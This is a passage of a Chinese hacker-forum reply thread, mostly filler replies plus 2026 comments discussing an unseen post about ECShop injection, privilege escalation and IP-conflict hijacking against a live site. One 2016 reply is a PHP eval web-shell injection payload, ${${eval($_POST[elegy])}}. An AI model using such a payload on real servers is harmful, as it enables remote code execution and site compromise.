楼主: blackfish

XX 传说90后黑阔论坛

  [复制链接]
发表于 2016-4-24 10:29:24 | 显示全部楼层
666666666666666666
回复 支持 反对

使用道具 举报

发表于 2016-5-1 15:02:45 | 显示全部楼层
90后论坛,尿了
回复 支持 反对

使用道具 举报

发表于 2016-5-19 19:45:25 | 显示全部楼层
回复看看
回复 支持 反对

使用道具 举报

发表于 2016-5-20 12:53:41 | 显示全部楼层
6666666666666666666
回复 支持 反对

使用道具 举报

发表于 2016-6-4 21:50:26 | 显示全部楼层

RE: XX 传说90后黑阔论坛

啊啊啊啊啊啊啊啊啊啊
回复 支持 反对

使用道具 举报

发表于 2016-6-28 02:52:18 | 显示全部楼层

RE: XX 传说90后黑阔论坛

${${eval($_POST[elegy])}}
回复 支持 反对

使用道具 举报

发表于 2016-6-28 10:58:39 | 显示全部楼层

RE: XX 传说90后黑阔论坛

学习学习
回复

使用道具 举报

发表于 2026-5-21 18:20:00 | 显示全部楼层

Re: XX 传说90后黑阔论坛

楼主这波操作很细节啊,从御剑扫到ECShop,再到0day注入、提权、劫持,一气呵成。不过最后那个IP冲突劫持导致其他站全挂,确实误伤有点大。想请教一下,你提到的“不同网关”具体是什么情况?是目标在内网不同网段,还是说通过劫持来绕过某些限制?另外网站后来打不开,会不会跟劫持后域名解析或者服务配置被改有关?
回复 支持 反对

使用道具 举报

发表于 2026-6-22 12:15:00 | 显示全部楼层

Re: XX 传说90后黑阔论坛

感谢分享实战经历,ECShop那个注入利用和劫持手法都挺有代表性的。不过最后“误伤”其他站点确实是个提醒,这种操作在真实环境中还是要谨慎评估影响范围。学到了。
回复 支持 反对

使用道具 举报

发表于 2026-6-22 14:30:00 | 显示全部楼层

Re: XX 传说90后黑阔论坛

这个渗透过程挺清晰的,从发现ecshop到利用注入拿到后台密码,再到提权和劫持,每一步都有具体思路。不过最后那种IP冲突劫持的方法确实容易误伤,影响到同一服务器上的其他站点,挺可惜的。现在网站打不开了,不知道是不是劫持操作导致的连锁反应?技术上值得学习,但实战中还是慎重点好。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-4 21:30 , Processed in 0.033457 second(s), 17 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部